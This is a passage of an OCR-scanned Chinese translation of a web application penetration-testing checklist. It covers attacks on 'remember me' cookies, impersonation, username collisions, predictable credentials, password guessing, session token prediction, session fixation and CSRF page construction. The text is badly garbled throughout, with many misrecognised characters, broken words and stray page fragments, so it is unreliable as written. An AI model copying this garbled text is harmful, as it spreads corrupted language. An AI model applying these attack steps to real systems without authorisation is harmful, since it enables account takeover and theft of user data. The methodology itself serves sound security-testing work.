(6) 如 末 该 功能 要 求 向 用 户 发送 一 封 电子 邮件 才能 完成 整个 恢复 过 程 ， 寻 找 任 何 可 带 助 控制 
其 他 用 户 账户 的 弱点 。 确 定 是 否 有 可 能 控制 接收 以 上 电子 邮件 的 地 址 。 如 采 邮 件 内 容 中 包含 一 个 
唯一 的 恢复 URL, 使 用 受 探 制 的 一 个 电子 邮件 地 址 获得 大 和 干 邮 件 , 尝试 确定 任何 可 帮助 预测 发 布 
给 其 他 用 户 的 URL 模 式 。 应 用 21.5.3 世 描述 的 方法 确定 所 有 可 预测 的 序列 。 
































21.4.6 ”测试 “ 记 住 我 ”功能 


(1) 如 果 主 登录 功能 或 它 的 支持 逻辑 包含 “ 记 住 我 ”功能 ,激活 这 项 功能 并 分 析 它 的 作用 。 如 
果 该 功能 允许 用 户 随 后 不 输入 任何 证 书 即 可 登录 , 那么 应 该 仔细 分 析 这 项 功能 ,查找 其 中 存在 的 
所 有 漏洞 。 

(2) 仔细 检查 激活 “ 记 住 我 ”功能 时 设 定 的 所 有 持久 性 cookie。 寻找 任何 明确 标识 出 用 户 号 份 
或 明显 包含 可 预测 的 用 户 标 识 符 的 数据 。 

(3) 即使 其 中 保存 的 数据 经 过 严密 编码 或 模糊 处 理 ， 也 要 仔细 分 析 这 些 数 据 ， 并 比较 “ 记 住 ” 
几 个 非常 类 似 的 用 户 名 和 密码 的 结果 ， 找 到 任何 可 对 原始 数据 进行 逆 回 工程 的 机 会 。 应 用 21.5.2 
节 描 述 的 方法 确定 所 有 有 用 的 数据 。 

(4) 根据 以 上 结果 ， 适 当 修 改 cookie 的 内 容 ， 尝 试 伪装 成 其 他 应 用 程序 用 户 。 

















21.4.7 ”测试 伪 浅 功能 


(1) 如 朱 应 用 程序 包含 任何 明确 的 功能 ， 人 允许 一 名 用 户 伪 疼 成 妨 一 名 用 户 ， 那 么 仔细 审查 这 
项 功能 ， 碍 找 所 有 允许 未 经 正 硝 授权 即 可 伪 交 成 任意 用 户 的 漏洞 。 




















21.4 测试 验证 机 制 595 


(2) 寻找 所 有 用 户 提 交 的 、 用 于 确定 伪 痛 目标 的 数据 。 答 试 修改 这 个 数据 ， 伪 疼 成 其 他 
用 户 ， 特 别 是 可 玫 助 提升 权限 的 管理 用 户 。 

(3) 当 针对 其 他 用 户 账 户 实施 上 自动 密码 猜测 攻击 时 ， 寻 找 所 有 明显 使 用 多 个 有 效 密码 的 
账户 , 或 者 几 个 使 用 相同 密码 的 账户 。 这 表示 应 用 程序 提供 后 门 密码 ， 以 便 管 理 员 使 用 它 时 以 任 
何 用 户 的 号 份 访问 应 用 程序 。 


21.4.8 测试 用 户 名 唯一 性 


(1) 如 果 应 用 程序 提供 自我 注册 功能 ， 人 允许 指定 想 要 的 用 户 名 ,那么 尝试 使 用 不 同 的 密码 注 
册 同 一 个 用 户 名 。 

(2) 如 果 应 用 程序 阻止 第 二 个 注册 尝试 ， 就 可 以 利用 这 种 行为 枚 举 出 注册 用 户 名 。 

(3) 如 果 应 用 程序 注册 以 上 两 个 账户 ， 深 入 分 析 这 种 情况 ， 确 定 用 户 和 名 与 密码 发 生 冲 突 时 应 
用 程序 的 行为 。 尝 试 修改 一 个 账户 的 密码 ,使 其 与 男 一 个 密码 相同 。 同 时 ， 演 试 使 用 完全 相同 的 
用 户 名 与 密码 注册 两 个 账户 。 

(4) 如 果 在 用 户 名 与 密码 发 生 冲 突 时 ， 应 用 程序 发 出 警报 或 产生 一 个 错误 ， 就 可 以 利用 这 种 
行为 实施 自动 化 猜测 攻击 , 确定 其 他 用 户 的 密码 。 针 对 一 个 枚 举 出 的 或 猜测 到 的 用 户 名 ， 尝试 使 
用 这 个 用 户 名 与 不 同 的 密码 创建 账户 ,应 用 程序 拒绝 某 个 特殊 的 密码 即 表 示 它 可 能 是 目标 账户 的 
现 有 密码 。 

(5) 如 果 应 用 程序 接受 相互 冲突 的 用 户 名 与 密码 ， 并 且 不 产生 错误 ， 那么 使 用 相互 冲突 的 
证 书 登 录 ， 确 定 应 用 程序 的 行为 ， 以 及 是 否 可 以 利用 这 种 行为 不 经 授权 即 可 访问 其 他 用 户 的 
账户 。 




































































21.4.9 测试 证 书 的 可 预测 性 


(1) 如 采用 户 名 或 密码 由 应 用 程序 日 动 生 成 ， 设 法 获得 几 个 紧密 相连 的 用 户 名 或 密码 ， 确 定 
任何 可 探测 的 顺序 或 模式 。 

(2) 如 打 用 户 名 以 可 预测 的 方式 生成 ,那么 回 后 推导 ， 获 得 一 组 可 能 有 效 的 用 户 名 。 这 些 用 
户 名 可 作为 目 动 密码 猜测 与 其 他 攻击 的 基础 。 

(3) 如 来 密码 以 可 预测 的 方式 生成 ， 那么 推导 这 种 模式 ,获取 应 用 程序 向 其 他 用 户 发 布 的 一 
组 密码 。 渗 透 测试 员 可 以 将 这 些 锯 码 与 获得 的 用 户 名 进行 组 合 ， 实 施 密 人 码 猜 测 攻 击 。 


21.4.10 ”检测 不 安全 的 证 书 传输 


(1) 过 历 所 有 需要 传输 证 书 、 与 验证 有 关 的 功能 ， 包 括 主 登 录 功 能 、 账 尸 注 册 功 能 、 密 码 
修改 功能 以 及 允许 查看 或 更 新 用 户 个 人 信息 的 页 面 。 使 用 拦截 代理 服务 希 监 探 客户 端 与 服务 大 之 
间 的 所 有 流量 。 

(2) 确定 在 来 回 方 癌 传输 证 书 的 每 一 种 情况 。 可 以 在 拦截 代理 服务 带 中 设置 拦 鹤 规则 ， 标 
记 包 含 特殊 字符 串 的 消息 。 
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(3) 如 果 证 书 在 URL 查 询 字符 串 中 传输 ， 那 么 这 些 证 书 可 能 会 通过 浏览 圳 历史 记录 、 屏 幕 、 
服务 融 日 志 以 及 Referer 消 息 头 〈 如 果 访 问 第 三 方 链 接 ) 泄露 。 

(4) 如 果 证 书 被 保存 在 cookie 中 ， 可 能 会 通过 XSS 攻 击 或 本 地 隐私 攻击 泄露 。 

(5) 如 果 证 书 被 从 服务 需 传 送 回 客户 端 , 攻击 者 就 可 以 利用 会 话 管理 或 访问 控制 漏洞 ， 或 者 通 
过 XSS 攻 击 获 取 这 些 证 书 。 

(6) 如 果 证 书 通 过 未 加 密 连 接 传送 ， 它 们 很 可 能 被 镭 听 者 拦截 。 

(7) 如 果 使 用 HTTPS 提 交 证 书 , 但 使 用 HTTP 加 载 登录 表单 ,那么 应 用 程序 就 容易 遭受 中 间 人 
的 攻击 ， 攻 击 者 也 可 能 使 用 这 种 攻击 手段 获取 证 书 。 

















21.4.11 检测 不 安全 的 证 书 分 配 


(1) 如 果 应 用 程序 通过 某 种 带 外 通道 创建 账户 ,或 者 它 提供 的 自我 注册 功能 本 身 并 不 决定 
用 户 使 用 的 全 部 初始 证 书 , 那么 应 该 确定 应 用 程序 采用 什么 方法 向 新 用 户 分 配 证 书 。 常 用 的 方法 
包括 发 送 电 子 邮 件 ， 或 者 向 邮政 地 址 寄 送 信件 。 

(2) 如 果 应 用 程序 生成 以 带 外 方式 分 配 的 账户 激活 URL， 尝 试 注册 几 个 紧密 相连 的 新 账户 ， 
并 确定 收 到 的 URL 中 的 顺序 。 如 果 能 确定 某 种 模式 , 努力 预测 应 用 程序 发 送 给 最 近 与 后 续 用 户 的 
URL， 并 尝试 使 用 这 些 URL 占 有 他 们 的 账户 。 

(3) 尝试 多 次 重复 使 用 同一 个 激活 URL，, 看 看 应 用 程序 是 否 允 许 这 样 做 。 如 果 遭 到 拒绝 ， 尝试 
在 重复 使 用 URL 之 前 锁定 目标 账户 , 看 看 URL 是 否 仍 然 可 用 。 确定 使 用 这 种 方法 是 否 可 以 给 一 个 
已 经 激活 的 账户 设 定 一 个 新 密码 。 


21.4.12 测试 不 安全 的 存储 


(1) 如 末 可 以 访问 散 列 密码 ， 应 检查 共享 同一 散 列 密码 值 的 账户 。 答 试 以 采用 最 稼 用 的 散 
列 值 的 密码 登录 。 
(2) 使 用 相关 散 列 算法 的 离线 彩虹 表 碍 找 明 文 值 。 


















































21.4.13 ”测试 逻辑 缺陷 


1. 测试 故障 开放 条 件 
(1) 对 于 要 求 应 用 程序 检查 用 户 证 书 的 每 一 项 功能 ( 包括 登录 与 密码 修改 功能 ), 使 用 受 控制 
的 账户 以 正常 方式 访问 这 些 功能 。 注 意 它 们 提交 给 应 用 程序 的 每 一 个 请 求 参数 。 
(2) 连续 多 次 重复 以 上 过 程 ， 以 各 种 无 法 预料 的 方式 轮流 修改 每 一 个 参数 ， 破 坏 应 用 程序 
的 逻辑 。 对 每 一 个 参数 进行 以 下 修改 。 
口 提交 一 个 空 字符 串 值 。 
口 完全 删除 名 / 值 对 。 
口 提交 非常 长 和 非常 短 的 值 。 
口 提交 字符 第 代 符 数字 或 提交 效 字 代 符 字符 串 。 
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口 以 相同 和 不 同 的 值 ， 多 次 提交 同一 个 命名 参数 。 

(3) 仔细 检查 应 用 程序 对 上 述 请 求 的 响应 。 如 果 出 现任 何 无 法 预料 的 差异 ， 对 这 个 结果 进 
行进 一 步 测试 。 如 果菜 个 修改 造成 行为 改变 , 设法 将 这 个 修改 与 其 他 更 改组 合 在 一 起 , 推动 应 用 
程序 的 逻辑 达到 其 限制 。 

2. 测试 多 阶段 处 理 机 制 

(1) 如 有 果 任 何 与 验证 有 天 的 功能 需要 在 一 系列 不 同 的 请 求 中 提交 证 书 ， 确 定 每 个 阶段 的 主 
要 上 日 的 ， 同 时 注意 每 个 阶段 提交 的 参数 。 

(2) 连续 多 次 重复 以 上 过 程 ， 修 改 提 交 请 求 的 顺序 ， 破 坏 应 用 程序 的 逻辑 。 相 关 测 试 包括 : 

口 以 不 同 的 顺序 完成 所 有 阶段 ， 到 达 想 要 的 那个 阶段 ; 

口 轮流 直接 进入 每 一 个 阶段 ， 然 后 按 正 稼 的 顺序 访问 后 续 步 又 ; 

口 几 次 访问 上 述 功能 , 轮流 省 略 每 一 个 阶段 , 然后 在 后 一 个 阶段 继续 按 正 篆 的 顺序 访问 

D 根据 观察 到 的 结 朱 及 每 个 功能 阶段 的 主要 目的 , 尝试 通过 其 他 方式 修改 访问 这 些 阶段 
的 顺序 ， 并 访问 开发 者 没有 预料 到 的 阶段 。 

(3) 确定 是 否 有 任何 一 项 信息 ( 如 用 户 名 ) 在 几 个 阶段 被 提交 ， 或 者 是 因为 用 户 提交 了 它 
儿 次 ,或 者 是 因为 它 通过 客户 端 在 隐藏 表单 子 段 、cookie 或 预 完 设置 的 查询 字符 串 参 数 中 传送 。 
如 果 是 这 样 ， 答 试 在 不 同 的 阶段 提交 不 同 的 值 (包括 有 效 和 无 效 的 值 )， 并 观察 其 后 采 。 设 法 确 
定 提 交 的 数据 是 否 是 多 余 的 , 或 者 在 一 个 阶段 确认 ,随后 即 被 应 用 程序 信任 ,或 者 在 不 同 的 阶段 
通过 不 同 的 检查 进行 确认 。 尝试 利用 应 用 程序 的 行为 获得 未 授权 访问 , 或 者 降低 多 阶段 机 制 实施 
的 控制 的 效率 。 

(4) 寻找 所 有 通过 客户 站 传送 的 数据 。 如 打 应 用 程序 使 用 隐藏 参数 在 各 个 功能 阶段 中 追踪 
进程 的 状态 ， 那么 攻击 者 就 可 以 修改 这 些 参 数 ， 从 而 破坏 应 用 程序 的 逻辑 。 

(5) 如 有 宁 进 程 的 任何 部 分 要 求 应 用 程序 采用 一 个 随机 变化 的 质询 ， 对 它 进 行 测试 ， 碍 找 以 
下 两 种 稼 见 的 缺陷 。 

口 如 果 一 个 指定 质询 的 参数 与 用 户 的 啊 应 一 起 提交 ， 确 定 是 否 可 以 修改 这 个 值 ， 选 择 目 
己 的 质询 。 

口 多 次 使 用 相同 的 用 户 名 处 理 上 述 不 断 变化 的 质询 ， 确 定 每 次 是 否 出 现 一 个 不 同 的 质 
询 。 如 果 每 次 的 质询 各 不 相同 ,那么 就 可 以 重复 进入 这 个 阶段 ， 直 到 应 用 程序 显示 大 
望 的 质询 ， 以 这 种 方式 选择 想 要 的 质询 。 
















































































21.4.14 ”利用 漏洞 获取 未 授权 访问 


(1) 分 析 在 各 种 验证 功能 中 发 现 的 所 有 漏洞 ， 确 定 所 有 可 在 攻击 应 用 程序 过 程 中 用 于 实现 
自己 的 目标 的 漏洞 。 通 常 ， 这 包括 尝试 以 另 一 名 用 户 的 身份 进行 验证 ; 如 有 可 能 ， 以 拥有 管理 权 
限 的 用 户 身份 验证 。 

(2) 在 实施 自动 攻击 之 前 ， 留 意 已 经 确定 的 所 有 账户 锁定 防御 。 例 如 ， 当 对 登录 功能 实施 用 
户 名 枚 举 攻击 时 ， 在 请 求 中 提交 一 个 常用 的 而 不 能 完全 随机 的 密码 ， 以 免 在 每 一 个 发 现 的 用 户 
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名 上 浪费 一 次 登录 失败 笠 试 。 同 样 ， 应 以 广度 优先 而 非 深 度 优先 的 方式 实施 密码 猜测 攻击 。 首 
先 使 用 单词 列表 中 最 常用 的 脆弱 密码 ， 然 后 使 用 其 他 值 ， 对 每 一 个 枚 举 出 的 用 户 名 实施 密码 猪 
测 攻击 。 

(3) 构建 在 密码 猜测 攻击 中 使 用 的 单词 列表 时 ， 应 考虑 密码 强度 规则 以 及 密码 确认 机 制 的 完 
整 性 ， 避 人 免 使 用 不 可 能 的 或 多 余 的 测试 密码 值 。 

(4) 使 用 第 14 章 摘 述 的 技巧 实施 尽 可 能 多 的 日 动 攻击 ， 提 高 攻击 的 速度 与 效率 。 


21.5 ”测试 会 话 党 理 机 制 














21.5.1 了 解 会 话 管理 机 制 











| 21.5.6 测试 令 牌 -会 话 映射 
| 21.5.7 测试 会 话 终 止 


21.5.9 检查 CSRF : 
21.5.10 检查 cookie 范围 ' 





天 过 一 -一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 二 一 一 一 一 一 二 


图 21-6 测试 会 话 管理 机 制 


21.5.1 了 解 会 话 沼 理 机 制 











() 分 析 应 用 程序 用 于 管理 会 话 与 状态 的 机 制 。 确 定 应 用 程序 是 否 使 用 会 话 令 牌 或 其 他 方法 
处 理 每 一 名 用 户 提交 的 各 种 请 求 。 请 注意 ， 用 户 通过 验证 后 ， 一 些 验证 技术 (如 HTTP 验 证 ) 并 
不 需要 使 用 完整 的 会 话机 制 重新 确认 用 户 的 身份 。 同 时 , 一些 应 用 程序 采用 一 种 无 会 话 状态 机 制 ， 
通常 使 用 一 个 加 密 或 模糊 处 理 的 表单 ， 通 过 客户 端 传送 所 有 状态 信息 。 

(2) 如 果 应 用 程序 使 用 会 话 令 牌 ， 确 定 它 到 底 使 用 哪些 数据 重新 确认 用 户 的 身份 。HTTP 
cookie 、 查 询 字 符 串 参数 以 及 隐藏 表单 字段 均 可 用 于 传送 令 牌 。 可 使 用 不 同 的 数据 共同 重新 确认 
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用 户 的 号 份 , 不 同 的 数据 可 能 被 不 同 的 后 端 组 件 使 用 。 有 时 ,看 似 为 会 话 令 牌 的 数据 实际 并 未 被 
应 用 程序 使 用 ， 例 如 ，Web 服 务 需 生成 的 默认 cookie。 

(3) 为 确定 应 用 程序 到 底 使 用 哪些 数据 作为 令 牌 ， 找 到 一 个 确信 依赖 会 话 的 页 面 ( 如 某 一 名 
用 户 的 “用 户 资料 ” 页 面 ) 或 功能 ， 并 回 它 提出 几 个 请 求 ， 系 统 性 地 删除 怀疑 被 用 作 令 牌 的 数据 
项 。 如果 删除 某 个 数据 项 后 , 应 用 程序 不 再 返回 依赖 会 话 的 页 面 , 即 可 确定 该 数据 项 为 会 话 令 牌 。 
Burp Repeater 是 执行 这 些 测 试 的 有 用 工具 。 

(4) 确定 应 用 程序 使 用 哪些 数据 重新 确认 用 户 的 身份 后 ,确定 它 是 否 对 每 个 令 脾 进行 完整 的 
人 确认， 或 者 是 否 忽 略 令 有 牌 的 某 些 组 成 部 分 。 修改 令 脾 的 值 ,一 次 修改 一 字 方 ， 并 确定 修改 后 的 值 
是 否 仍然 被 应 用 程序 接受 。 如 果 发 现 令 牌 的 某 些 部 分 并 未 被 用 于 保持 会 话 的 状态 , 就 不 必 上 再 深入 
分 析 它 们 。 
































21.5.2 ”测试 令 牌 的 含义 


(1) 在 不 同时 间 以 几 个 不 同 的 用 户 登 录 ， 记 录 服 务 需 发 布 的 令 牌 。 如 果 应 用 程序 允许 自我 注 
册 ， 就 可 以 选择 自己 的 用 户 名 ， 用 一 系列 存在 细微 差别 的 相似 用 户 名 登录 ， 如 A、AA、AAA、 
AAAA、AAAB、AAAC、AABA 等 。 如 果 其 他 与 某 一 名 用 户 有 关 的 数据 〈 如 电子 邮件 地 址 ) 在 
登录 阶段 提交 或 保存 在 用 户 资料 中 ， 对 其 进行 与 前 面 类 似 的 系统 化 修改 ， 并 截获 收 到 的 令 牌 。 

(2) 分 析 收 到 的 令 牌 ， 查 找 所 有 与 用 户 名 和 其 他 用 户 可 控制 的 数据 有 关 的 内 容 。 

(3) 分 析 令 牌 ， 查 找 所 有 明显 的 编码 或 模糊 处 理 方案 。 查 找 用 户 名 长 度 与 令 牌 长 度 之 间 的 所 
有 相互 关系 ; 这 种 关系 表示 应 用 程序 明显 使 用 了 某 种 模糊 处 理 或 编码 方案 。 如 果 用 户 名 包含 一 组 
相同 的 字符 , 在 令 牌 中 寻找 表示 可 能 使 用 XOR 模 糊 处 理 的 对 应 字符 序列 ; 在 令 牌 中 寻找 仅 包含 十 
六 进 制 字 符 的 序列 ， 它 表示 应 用 程序 可 能 对 ASCII 字 符 串 进行 了 十 六 进 制 编码 处 理 ， 或 者 披露 其 
他 信息 。 和 寻找 以 等 号 (=) 结尾 的 字符 序列 或 仪 包含 其 他 有 效 Base64 字 符 的 序列 ， 如 a-z、A-Z、 
0-9、 十 和 /。 

(4) 如 果 可 以 从 会 话 令 牌 样本 中 获得 任何 有 意义 的 数据 ,确定 这 些 信息 是 否 足 以 帮助 发 动 攻 
击 , 猜测 出 最 近 发 布 给 其 他 应 用 程序 用 户 的 令 牌 。 找 到 一 个 依赖 会 话 的 应 用 程序 页 面 , 使 用 第 14 
章 描 述 的 技巧 自动 生成 和 测试 可 能 的 令 牌 。 










































































21.5.3 测试 令 牌 的 可 预测 性 


(1) 使 用 一 个 可 使 服务 器 返回 一 个 新 令 牌 的 请 求 (例如 一 个 成 功 登 录 请 求 )， 生 成 并 截获 大 量 
紧密 相连 的 会 话 令 牌 。 

(2) 设法 确定 令 牌 样本 中 的 所 有 模式 。 在 所 有 情况 下 ， 都 应 使 用 Burp Sequtncer 对 应 用 程序 令 
牌 的 随机 特性 进行 详细 的 统计 测试 ， 如 第 7 草 所 述 。 然 而 ， 根 据 日 动 扫 摘 结 末 ， 仍 然 需 要 进行 一 
些 手 动 分 析 。 

口 理解 应 用 程序 重新 确认 用 户 刁 份 的 令 牌 和 子 序列 。 忽略 并 未 用 于 确定 用 户 刁 份 的 所 有 
数据 ， 即 使 样本 中 的 这 些 数据 发 生 了 变化 。 
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口 如 果 不 清楚 令 牌 或 者 令 牌 的 所 有 组 成 成 分 使 用 何 种 类 型 的 数据 , 尝试 使 用 各 种 解码 方法 
( 例如 Base64 ), 看 能 否 得 到 更 有 意义 的 数据 。 有 时 可 能 有 必要 连续 使 用 几 种 解码 方法 。 
D 设法 确定 解码 后 的 令 牌 或 组 成 成 分 数据 中 存在 的 所 有 模式 。 计 算 连 续 值 之 间 的 差距 。 
即使 这 些 值 看 似 杂 乱 无 草 , 但 是 它们 之 间 仍 然 可 能 存在 固定 的 差距 ,允许 渗透 测试 员 
显 者 缩小 蛋 力 攻击 的 范围 。 
DO 等 待 儿 分 钟 后 ， 稚 取 类 似 的 一 组 令 牌 样本 ， 重 复 进 行 上 述 分 析 。 设 法 确定 令 牌 的 内 容 
是 否 具有 时 间 依 赖 性 。 
(3) 如 宁 已 经 确定 了 所 有 模式 ， 使 用 一 个 不 同 的 下地 址 与 用 户 名 截获 另 一 组 令 牌 样本 ， 确 
定 是 否 可 以 探查 到 相同 的 模式 ， 或 者 是 否 可 以 对 第 一 组 令 牌 进行 推导 ， 猜 测 出 第 二 组 令 牌 。 
(4) 如 末 能 够 确定 可 利用 的 序列 或 时 间 依 赖 关 系 ， 考 虑 这 些 信息 是 否 足 以 帮助 发 动 攻击 ， 猜 
测 出 最 近 发 布 给 其 他 应 用 程序 用 户 的 令 牌 。 使 用 第 14 章 描述 的 技巧 自动 生成 和 测试 可 能 的 令 牌 。 
除 最 简单 的 序列 外 ， 可 能 需要 在 攻击 中 使 用 某 些 定制 脚本 。 
(5) 如 果 会 话 ID 似乎 是 定制 编写 的 ， 可 以 使 用 Burp Intruder 中 的 “位 翻转 ”有 效 载 荷 源 继 续 轮 
流 修改 会 话 令 牌 中 的 每 个 位 。 同 时 , 在 啊 应 中 碍 找 表 明 修改 令 牌 是 否 会 导致 会 话 无 效 ， 或 会 话 是 
个 属于 其 他 用 户 的 字符 串 。 


21.5.4 检查 不 安全 的 令 牌 传输 


(1) 以 正常 方式 访问 应 用 程序 ， 从 “起 始 ”URL 中 的 未 通过 验证 的 内 容 开 始 ， 到 登录 过 程 ， 再 
到 应 用 程序 的 全 部 功能 。 留 意 发 布 新 会 话 令 牌 的 每 一 种 情况 ， 确 定 哪些 部 分 使 用 HITP 通 信 ， 哪 
些 部 分 使 用 HTTPS 通 信 。 可 以 使 用 拦截 代理 需 的 日 志 功 能 记录 这 些 信息 。 

(2) 如 果 应 用 程序 使 用 HTTP cookie 传 送 会 话 令 牌 ， 应 确认 其 是 否 设 置 了 安全 标记 ， 防 止 通过 
HTTP 连 接 传 送 令 牌 。 

(3) 在 正常 使 用 应 用 程序 的 情况 下 ， 确 定 会 话 令 牌 是 否 通 过 HTTP 连 接 传送 。 如 果 是 这 样 ， 
它们 就 很 容易 被 拦截 。 

(4) 如 果 应 用 程序 在 未 通过 验证 的 区 域 使 用 HTTP， 然 后 在 登录 或 通过 验证 的 区 域 转换 到 
HTTPS , 那么 确认 应 用 程序 是 否 为 HTTPS 通 信 发 布 一 个 新 的 令 牌 , 或 者 应 用 程序 在 转换 到 HTTPS 
后 是 否 仍然 使 用 HTTP 阶 段 的 令 牌 。 如 果 是 这 样 ， 它 们 就 很 容易 被 拦截 。 

(5) 如 果 应 用 程序 的 HTTPS 区 域 包 含 指 向 HTTP URL 的 链接 ， 访问 这 些 链 接 ， 确 认 在 访问 过 程 
中 是 否 有 会 话 令 牌 被 提交 ; 如 果 是 这 样 ， 该 令 牌 或 者 继续 有 效 ， 或 者 立即 被 服务 需 终 止 。 
21.5.5 ”检查 在 日 志 中 泄露 的 令 牌 

(1) 如 果 在 应 用 程序 解析 过 程 中 能 确定 任何 日 志 、 监 控 或 诊断 功能 ， 应 仔细 检查 这 些 功 能 ， 
确定 它们 是 否 泄露 任何 会 话 令 有 牧 ,。 确 定 在 正常 情况 下 哪些 人 有 权 访 问 这 些 功 能 ; 如 果 只 有 管理 员 


能 够 使 用 这 些 功能 ， 那 么 确认 低 权 限 用 户 是 否 可 以 利用 任何 其 他 漏洞 访问 它们 。 
(2) 确定 所 有 在 URL 中 传送 会 话 令 牌 的 情况 。 可 能 应 用 程序 通常 以 更 加 安全 的 方式 传送 令 









































































































































21.$ 测试 会 话 管 理 机 制 601 





牌 ， 而 开发 者 在 特定 情况 下 使 用 URL 来 解决 特殊 难题 。 如 条 是 这 样 ， 当 用 户 访问 站 外 链接 时 ， 这 
些 令 牌 将 在 Referez 消 息 头 中 传送 。 确 定 所 有 人 允许 在 其 他 用 户 可 碍 看 的 页 面 中 搬入 任意 站 外 链接 
的 功能 。 

(3) 如 采 能 够 收集 到 发 布 给 其 他 用 户 的 有 效 会 话 令 牌 ， 就 对 每 个 令 牌 进行 测试 ， 确 定 它 是 否 
属于 管理 用 户 ( 例如 ， 党 试 使 用 令 牌 访问 某 个 特权 功能 )。 


21.5.6 ”测试 令 牌 -会 话 映 射 


(1) 用 同一 个 用 户 账户 从 不 同 的 浏览 进 程 或 从 不 同 的 计算 机 两 次 登录 应 用 程序 。 确 定 这 两 
个 会 话 是 否 痢 处 于 活动 状态 。 是 丈 表 示 应 用 程序 支持 并 行 会 话 , 可 让 攻破 其 他 用 户 证 书 的 攻击 者 
能 够 利用 这 些 证 书 ， 而 不 会 有 被 检测 出 来 的 风险 。 

(2) 使 用 同一 个 用 户 账户 从 不 同 的 浏览 硕 进 程 或 从 不 同 的 计算 机 登录 并 退出 应 用 程序 几 次 。 
确定 应 用 程序 在 每 次 登录 时 是 发 布 一 个 新 会 话 令 牌 , 还 是 发 布 相同 的 令 牌 。 如 末 每 次 发 布 相同 的 
令 牌 , 那么 应 用 程序 根本 没有 正确 使 用 令 牌 ， 而 是 使 用 唯一 持久 性 字符 串 重 新 确认 用 户 身 份 。 在 
这 种 情况 下 ， 应 用 程序 就 没有 办 法 防止 并 行 登录 或 正确 实施 会 话 超 时 。 

(3) 如 宁 令 牌 明显 包含 菏 种 结构 和 意义 ， 设 法 将 标识 用 户 吴 份 的 成 分 与 无 法 辨别 的 成 分 区 分 
开 来 。 尝试 修改 与 用 户 有 关 的 所 有 令 牌 成 分 , 使 其 指向 其 他 已 知 的 应 用 程序 用 户 ， 并 确定 修改 后 
的 令 牌 是 否 被 应 用 程序 接受 ， 以 及 能 够 让 攻击 者 伪装 成 该 用 户 。 请 参阅 第 7 章 了 解 这 种 细微 漏洞 
的 示例 。 


21.5.7 ”测试 会 话 终 止 


(1) 当 测 试 会 话 超时 与 退出 漏洞 时 ， 主 要 测试 服务 硕 如 何 处 理会 话 与 令 牌 ， 而 不 是 客户 端 发 
生 的 任何 事件 。 在 客户 端 浏 览 句 内 对 令 牌 执行 的 操作 并 不 能 终止 会 话 。 

(2) 检查 服务 大 是 否 执行 会 话 终止 。 

口 登录 应 用 程序 获得 一 个 有 效 令 牌 。 

口 不 使 用 这 个 令 牌 ， 等 待 一段 时 间 后 ， 用 这 个 令 牌 提交 一 个 访问 受 保 护 页 面 ( 如 “我 的 
资料 ”页 面 ) 的 请 求 。 

口 如 末 该 页 面 正 背 显 示 ， 那 么 令 牌 仍然 处 于 活动 状态 。 

口 使 用 反复 试验 的 方法 确定 会 话 终止 超时 时 间 为 多 入， 或 者 一 个 令 牌 在 前 一 次 使 用 它 提 
交 请 求 几 天 后 是 否 仍 被 使 用 。 可 配置 Burp Intruder 递 增 连 续 请 求 之 间 的 时 间 间 隔 , 自动 
完成 这 项 任务 。 

(3) 检查 退 出 功能 是 否 存 在 。 如 果 应 用 程序 使 用 退出 功能 ， 测 试 它 是 否 能 够 在 服务 右上 有 效 
确认 用 户 的 会 话 。 退 出 后 ,尝试 重新 使 用 原 有 的 令 脾 ,使 用 它 请 求 一 个 受 保 护 的 页 面 ,确定 其 是 
否 仍 然 有 效 。 如 有 果 令 有 牌 仍然 有 效 ， 那么 即使 用 户 已 经 “退出 ”， 他们 依然 易于 受到 会 话 支持 攻击 。 
可 以 使 用 Burp Repeater 从 代理 历史 记录 中 不 断 发 送 一 个 特殊 的 请 求 ， 观 察 退出 后 应 用 程序 是 否 做 
出 不 同 的 啊 应 。 
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21.5.8 测试 会 话 固定 


(1) 如 果 应 用 程序 向 未 通过 验证 的 用 户 发 布 令 牌 ， 获 取 令 牌 并 登录 。 如 果 应 用 程序 在 登录 后 
并 不 发 布 一 个 新 令 牌 ， 就 表示 它 易 于 受到 会 话 固定 攻击 。 

(2) 即使 应 用 程序 并 不 同 未 通过 验证 的 用 户 发 布 会 话 令 牌 ， 也 可 通过 登录 获得 一 个 令 牌 ， 然 
后 返回 登录 页 面 。 如 果 应 用 程序 “愿意 ”返回 这 个 页 面 ， 即 使 已 经 通过 验证 ， ee 
牌 以 男 一 名 用 户 的 身份 提交 男 一 次 登录 。 如 果 应 用 程序 在 第 二 次 登录 后 并 不 发 布 一 个 新 令 牌 ,就 
表示 它 易于 受到 会 话 固定 攻击 。 

(3) 确定 应 用 程序 会 话 令 牌 的 格式 。 用 一 个 捏造 的 、 格 式 有 效 的 值 修改 令 牌 ， 然 后 尝试 使 用 
它 登 录 。 如 果 应 用 程序 允许 使 用 一 个 捏造 的 令 牌 建立 通过 验证 的 会 话 ， 就 表示 它 易 于 受到 会 话 固 
定 攻击 。 

(4) 如 果 应 用 程序 并 不 支持 登录 功能 ,但 人 处理 敏感 数据 ( 如 个 人 信息 和 支付 细节 )， 并 在 提交 
后 显示 这 些 信息 (如 在 确认 订单 ”页 面 上 )， 那 么 可 以 使 用 前 面 的 三 种 测试 方法 尝试 访问 显示 
敏感 数据 的 页 面 。 如 果 在 匿名 使 用 应 立 用 程序 期 间 生 成 的 令 牌 可 用 于 获取 用 户 的 敏感 信息 , 那么 应 
用 程序 就 易于 遭受 会 话 固 定 攻击 。 































































































21.5.9 检查 CSRF 


(1) 如 果 应 用 程序 完全 依靠 HITP cookie 传 送 会 话 令 牌 ， 它 很 可 能 容易 受到 跨 站 点 请 求 伪 造 
( CSRF ) 攻击 。 

(2) 分 析 应 用 程序 的 关键 功能 ， 确 定 用 于 执行 敏感 操作 的 特定 请 求 。 如 果 这 些 请 求 中 的 参数 
完全 可 由 攻击 者 事先 决定 ( 也 就 是 说 ,其 中 并 不 包含 任何 会 话 令 牌 .无 法 预测 的 数据 或 其 他 机 密 )， 
那么 几乎 可 以 肯定 应 用 程序 易于 受到 攻击 。 

(3) 创建 一 个 HTML 页面, 它 不 需要 进行 任何 用 户 交 互 , 即 可 提出 想 要 的 请 求 。 对 于 GET 请 求 ， 
可 以 使 用 一 个 <img> 标 签 ， 并 通过 src 参 数 设置 易 受 攻击 的 URL。 对 于 POST 请 求 ， 可 以 建立 一 个 
表单 ， 其 中 包含 实施 攻击 所 需 全 部 相关 参数 的 隐藏 字段 ,并 将 其 目标 设 为 易 受 攻击 的 URL。 可 以 
